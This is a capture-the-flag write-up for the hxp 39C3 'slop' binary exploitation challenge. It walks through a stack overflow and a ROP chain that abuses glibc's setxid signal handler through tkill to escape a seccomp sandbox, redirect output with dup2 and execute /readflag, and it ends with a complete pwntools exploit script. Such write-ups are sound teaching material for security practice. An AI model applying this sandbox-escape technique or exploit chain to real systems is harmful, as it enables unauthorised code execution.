hxp 39C3 CTF: slop writeup

Although I did not attend 39C3, I played the hxp CTF for a bit with the justCatTheFish team. I focused on the slop pwn challenge, which we almost solved but did not manage to finish in time. I thought the challenge was very cool, so I decided to finish it and post this writeup.

The challenge files can be downloaded here. It’s a Linux user-space binary exploitation challenge. The binary is statically linked with the following mitigations:

$ pwn checksec ./slop
Arch:       amd64-64-little
RELRO:      Partial RELRO
Stack:      Canary found
NX:         NX enabled
PIE:        No PIE (0x400000)
Stripped:   No

Among the provided files, we also get the source code (slop.c), a readflag binary, and a Dockerfile. Because of how the permissions are set up in the Dockerfile, we can’t read /flag.txt directly and instead have to run the setgid /readflag program, which prints the flag to stdout.

How does `slop` work?

The program listens on a TCP socket and handles the connection in another thread. This is what happens at a high level. First, the main thread:

1. A TCP socket is created and listens on port 1234, waiting for a single connection. After a client connects, execution continues to point 2.
2. The random_memory function is called, which allocates a new stack at a randomized address. At this point the new stack is only allocated, not yet in use. I’m not sure why this is in the challenge; as it turns out, there is no need to leak this address or explicitly use the new stack.
3. A new connection thread is started with handle_request as the entry point.
4. Finally, the stack is switched to the address from point 2 and the program enters a tight infinite loop that repeatedly calls sched_yield.

The connection thread does this:

1. Reads 0x300 bytes from the socket straight onto the thread’s stack. The data conveniently lands almost right at the return address (__builtin_frame_address(0)), so no canary leak is needed.
2. Installs a seccomp policy that allows only the following syscalls: pause, nanosleep, alarm, getpid, exit, wait4, kill, getcwd, sysinfo, tkill, exit_group, waitid. Any other syscall made from this thread terminates the program.
3. If the return address is not overwritten, handle_request returns to pthreads (start_thread) and crashes because it calls the rt_sigprocmask syscall, which is not allowed.
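
To make the constraint concrete, here is a tiny Python sketch that checks syscall names against the allowlist above. The allowlist is copied from the policy description; the helper name and the two example sets are only illustrations.

```python
# Syscalls the seccomp policy allows in the connection thread (from the list above).
ALLOWED = {
    "pause", "nanosleep", "alarm", "getpid", "exit", "wait4", "kill",
    "getcwd", "sysinfo", "tkill", "exit_group", "waitid",
}

def blocked(syscalls):
    """Return, sorted, the syscalls that would terminate the program in this thread."""
    return sorted(set(syscalls) - ALLOWED)

# Syscalls that would be handy for getting the flag back over the socket.
print(blocked(["dup2", "execve"]))                         # ['dup2', 'execve']
# Syscalls for signalling and waiting.
print(blocked(["getpid", "tkill", "nanosleep", "pause"]))  # []
```

In other words, the sandboxed thread can signal and sleep, but it cannot duplicate file descriptors or execute a program on its own.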

From this behavior, we can deduce that we first need to take over the execution of the connection thread with a ROP chain (there is a generous 0x300-byte budget) and from there somehow take over the execution of the main thread, which is not sandboxed by seccomp. Then we need to run the /readflag binary so that it outputs the flag to the socket. There are two issues here:

1. The main thread is stuck in this loop:
```
0x401a5d <main+269>    mov    eax, 0x18
0x401a62 <main+274>    syscall <SYS_sched_yield>
0x401a64 <main+276>    jmp    main+269
```
Even with full control over the memory from the connection thread’s ROP chain, we can’t break out of the loop. There needs to be another way of triggering execution in the main thread.
2. Simply calling execve on /readflag will print the flag to stdout on the server and not to our connection. We need a way to redirect stdout to the socket.

For the first issue, a natural solution is to trigger a signal handler which would run asynchronously in the context of the main thread. We can manipulate the memory it operates on from the connection thread and hopefully take over the execution.

For the second one, we need to call the dup2 syscall, but that requires code execution in the main thread because the syscall is blocked by the seccomp policy. So let’s take a look at signals first.
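
The effect of dup2 followed by execve can be reproduced in isolation. The sketch below is not part of the exploit: it uses a socketpair and /bin/echo as stand-ins for the challenge socket and /readflag, and the helper name is made up. It assumes a Linux system where /bin/echo exists.

```python
import os
import socket

def run_with_stdout_on_socket(argv):
    """Fork, point the child's stdout at a socket with dup2, exec argv, return its output."""
    ours, theirs = socket.socketpair()
    pid = os.fork()
    if pid == 0:
        # Child: make fd 1 (stdout) refer to the socket, then replace the process image.
        try:
            os.dup2(theirs.fileno(), 1)
            os.execv(argv[0], argv)
        finally:
            os._exit(127)  # only reached if dup2 or execv failed
    theirs.close()
    chunks = []
    while True:
        chunk = ours.recv(4096)
        if not chunk:  # empty read: the child exited and its end was closed
            break
        chunks.append(chunk)
    ours.close()
    os.waitpid(pid, 0)
    return b"".join(chunks)

if __name__ == "__main__":
    print(run_with_stdout_on_socket(["/bin/echo", "hello over the socket"]))
```

The executed program never learns about the socket; it simply writes to file descriptor 1, which is why the redirection has to happen before execve.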

Finding a signal handler

The program doesn’t explicitly register any signal handlers, and the seccomp policy doesn’t allow registering one. This means we can’t simply register a handler and then trigger its execution in the main thread. We need to find an already registered signal handler and trigger it with one of the allowed syscalls.

Now, how do we discover which signals a process handles? We found the right signal by trial and error, but unfortunately lost a lot of time here. Only after the CTF did I realise that, unless the handler is somehow magically set up by the kernel, it has to show up in strace. And indeed, the handler is registered with rt_sigaction when the connection thread is spawned:

$ strace -e t='/.*sig.*' ./slop
--- SIGWINCH {si_signo=SIGWINCH, si_code=SI_KERNEL} ---
rt_sigaction(SIGRT_1, {sa_handler=0x42e9f0, sa_mask=[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x41fc60}, NULL, 8) = 0
rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, ~[], [], 8)   = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
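
Another way to check, not used in this writeup, is the SigCgt field of /proc/<pid>/status. On Linux it is a hex bitmask of caught signals, where bit n-1 corresponds to signal n. The sketch below decodes such a mask; the helper name and the sample mask are illustrative assumptions, not values captured from the challenge.

```python
def caught_signals(sigcgt_hex):
    """Decode a SigCgt-style hex bitmask into a sorted list of signal numbers."""
    mask = int(sigcgt_hex, 16)
    # Bit 0 stands for signal 1, bit 1 for signal 2, and so on.
    return [bit + 1 for bit in range(mask.bit_length()) if (mask >> bit) & 1]

# Illustrative mask with only bit 32 set, i.e. signal 33.
print(caught_signals("0000000100000000"))  # [33]
```

On a live process the mask can be read with something like `grep SigCgt /proc/<pid>/status`. The handler can only show up there after it has been registered, which here means after a client has connected.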

The rt_sigaction call in the strace output comes from the pthreads library: it registers the handler function __nptl_setxid_sighandler (0x42e9f0) for signal number 33 (SIGRT_1, aka SIGSETXID). For this challenge, it is not necessary to know what the handler is legitimately used for, but it runs code that is perfect for exploitation:

/* Set by __nptl_setxid and used by __nptl_setxid_sighandler.  */
static struct xid_command *xidcmd;

/* We use the SIGSETXID signal in the setuid, setgid, etc. implementations to
   tell each thread to call the respective setxid syscall on itself.  This is
   the handler.  */
void
__nptl_setxid_sighandler (int sig, siginfo_t *si, void *ctx)
{
  int result;

  /* Safety check.  It would be possible to call this function for
     other signals and send a signal from another process.  This is not
     correct and might even be a security problem.  Try to catch as
     many incorrect invocations as possible.  */
  if (sig != SIGSETXID
      || si->si_pid != __getpid ()
      || si->si_code != SI_TKILL)
    return;

  result = INTERNAL_SYSCALL_NCS (xidcmd->syscall_no, 3, xidcmd->id[0],
				 xidcmd->id[1], xidcmd->id[2]);
  int error = 0;
  if (__glibc_unlikely (INTERNAL_SYSCALL_ERROR_P (result)))
    error = INTERNAL_SYSCALL_ERRNO (result);
  setxid_error (xidcmd, error);
  ...
}

This essentially means that we can call an arbitrary syscall by pointing xidcmd at a crafted xid_command structure before triggering the handler. Here is what it looks like in the challenge:

0x42ea23 <__nptl_setxid_sighandler+51>    mov    rax, qword ptr [rip + 0x97746]     RAX, [xidcmd]
0x42ea2a <__nptl_setxid_sighandler+58>    mov    rsi, qword ptr [rax + 0x10]
0x42ea2e <__nptl_setxid_sighandler+62>    mov    rdi, qword ptr [rax + 8]
0x42ea32 <__nptl_setxid_sighandler+66>    mov    rdx, qword ptr [rax + 0x18]
0x42ea36 <__nptl_setxid_sighandler+70>    mov    eax, dword ptr [rax]
0x42ea38 <__nptl_setxid_sighandler+72>    syscall
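
The offsets read in the disassembly line up with the layout of struct xid_command. The ctypes sketch below mirrors that layout as I understand it from glibc (an int syscall number, three 64-bit ids, then the cntr and error ints). The class name and the exact field widths are assumptions for x86-64, not something taken from the challenge files.

```python
import ctypes

class XidCommand(ctypes.Structure):
    """Assumed x86-64 layout of glibc's struct xid_command."""
    _fields_ = [
        ("syscall_no", ctypes.c_int32),  # loaded into eax
        ("id", ctypes.c_uint64 * 3),     # loaded into rdi, rsi, rdx
        ("cntr", ctypes.c_int32),
        ("error", ctypes.c_int32),       # inspected by setxid_error
    ]

for name in ("syscall_no", "id", "cntr", "error"):
    print(name, hex(getattr(XidCommand, name).offset))
```

Under these assumptions the three ids sit at offsets 0x8, 0x10 and 0x18, matching the loads into rdi, rsi and rdx, and the error field sits at 0x24.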

The handler performs some prior safety checks, but we satisfy all of them:

Signal number is SIGSETXID (33) - this is always true.
Sent from the same PID - both threads share the same PID.
Sent from tkill syscall - allowed by seccomp.

Gracefully returning from the handler allows us to make multiple syscalls. We need to make sure xidcmd->error is set to 0, otherwise setxid_error will abort the program.
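
The checks and the error bookkeeping can be modelled in a few lines of Python. This is a simplified sketch based on my reading of glibc, not the real implementation: the function name is made up, SI_TKILL is taken to be -6 as on Linux, and the -1 "no call yet" state of the error field is how I understand setxid_error to work.

```python
SIGSETXID = 33
SI_TKILL = -6  # Linux si_code for signals sent with tkill/tgkill

def model_handler(sig, si_pid, si_code, own_pid, stored_error, syscall_error):
    """Return what the modelled handler does: 'ignored', 'abort' or 'ok'."""
    # Safety checks from __nptl_setxid_sighandler.
    if sig != SIGSETXID or si_pid != own_pid or si_code != SI_TKILL:
        return "ignored"
    # (the syscall described by the fake xid_command would run here)
    # setxid_error: the stored error must match this result or still be unset (-1).
    if stored_error not in (syscall_error, -1):
        return "abort"
    return "ok"

print(model_handler(33, 1000, SI_TKILL, 1000, stored_error=0, syscall_error=0))  # ok
print(model_handler(33, 1000, SI_TKILL, 1000, stored_error=5, syscall_error=0))  # abort
print(model_handler(33, 1000, 0, 1000, stored_error=0, syscall_error=0))         # ignored
```

For a syscall that succeeds, the error value is 0, so keeping the stored error at 0 is the simplest way to stay on the "ok" path.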

Full exploit

We now have all the pieces required to construct the exploit. The ROP chain has to:

1. Overwrite the xidcmd pointer.
2. Set up a fake xid_command structure to call dup2(4, 1) and call tkill to trigger it in the main thread.
3. Call nanosleep to make sure the previous step has finished.
4. Set up a fake xid_command structure to call execve("/readflag", 0, 0) and call tkill to trigger it in the main thread.
5. Call pause so the program doesn’t crash.

As a side note, I couldn’t find this gadget with ropper or pwntools, which is weird:

$ ROPgadget --binary ./slop | grep 'xchg edi'
0x000000000047a8c6 : xchg edi, eax ; ret

And finally, here is the full exploit code:

#!/usr/bin/env python3
from pwn import *

exe = context.binary = ELF(args.EXE or './slop')

def start(argv=[], *a, **kw):
    port = 1024
    if args.REMOTE:
        return remote(args.HOST or 'localhost', port, *a, **kw)
    else:
        gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
        sleep(1)
        return remote('localhost', port, *a, **kw)

gdbscript = '''
continue
'''.format(**locals())

# ROP gadgets
pop_rax_ret = 0x4051bf
pop_rdi_ret = 0x402701
pop_rsi_ret = 0x405caf
mov_mem_rsi_rax_ret = 0x417f21 # mov qword ptr [rsi], rax; ret;
syscall_ret = 0x405972
xchg_edi_eax_ret = 0x47a8c6

# writable memory, nothing important there
fake_xidcmd = 0x4c1000
execve_path = fake_xidcmd + 0x100

def write_mem(where, what):
    return [
        pop_rsi_ret, where,
        pop_rax_ret, what,
        mov_mem_rsi_rax_ret
    ]

def syscall(syscall_nr, rdi=None, rsi=None):
    return [
        pop_rax_ret, syscall_nr,
        # compare against None so that an explicit 0 argument is still loaded
        [pop_rdi_ret, rdi] if rdi is not None else [],
        [pop_rsi_ret, rsi] if rsi is not None else [],
        syscall_ret
    ]

def tkill(syscall_nr, rdi, rsi, rdx=None):
    return [
        write_mem(fake_xidcmd, syscall_nr), # rax
        write_mem(fake_xidcmd+0x8, rdi),
        write_mem(fake_xidcmd+0x10, rsi),
        write_mem(fake_xidcmd+0x18, rdx) if rdx is not None else [],
        write_mem(fake_xidcmd+0x24, 0), # xidcmd->error has to be 0

        exe.sym['getpid'], # we can just call getpid from libc
        xchg_edi_eax_ret,

        syscall(constants.SYS_tkill,
                None, # rdi already set with xchg
                33) # SIGRT_1
    ]

rop = flat([
    # 1
    write_mem(exe.sym['xidcmd'], fake_xidcmd),

    # 2
    tkill(constants.SYS_dup2, 4, 1),

    # 3
    syscall(constants.SYS_nanosleep,
            0x4bf128, # fake timespec - 1s wait
            0),

    # 4
    write_mem(execve_path, u64(b'/readfla')),
    write_mem(execve_path+8, u64(b'g'+b'\x00'*7)),

    tkill(constants.SYS_execve, execve_path, 0, 0),

    # 5
    syscall(constants.SYS_pause)
])

io = start()
io.recvuntil(b'send me your slop:\n')
io.send(b'A'*8 + rop)
io.interactive()
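
As a sanity check on the 0x300-byte budget, the size of the chain can be estimated without pwntools by counting 8-byte stack slots. The helpers below only mirror the shape of write_mem, syscall and tkill from the exploit, and they count every explicitly passed argument, so the result is an estimate under that assumption and not a measurement of the real payload.

```python
SLOT = 8        # one gadget address or value on the stack
BUDGET = 0x300  # bytes read by the connection thread

def write_mem_slots():
    return 5  # pop rsi, where, pop rax, what, mov [rsi], rax

def syscall_slots(rdi=False, rsi=False):
    return 2 + 2 * rdi + 2 * rsi + 1  # pop rax + nr, optional args, syscall

def tkill_slots(rdx=False):
    writes = 4 + rdx  # syscall_nr, rdi, rsi, error (+ rdx when given)
    # fake struct writes, then getpid + xchg, then the tkill syscall with rsi set
    return writes * write_mem_slots() + 2 + syscall_slots(rsi=True)

chain = (
    write_mem_slots()                    # 1: overwrite xidcmd
    + tkill_slots()                      # 2: dup2 via the handler
    + syscall_slots(rdi=True, rsi=True)  # 3: nanosleep
    + 2 * write_mem_slots()              # 4: "/readflag" string
    + tkill_slots(rdx=True)              #    execve via the handler
    + syscall_slots()                    # 5: pause
)
payload_size = 8 + chain * SLOT  # 8 bytes of padding precede the chain
print(hex(payload_size), payload_size <= BUDGET)  # 0x2a8 True
```

By this count the payload stays below the limit, with room to spare for a few more gadgets.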
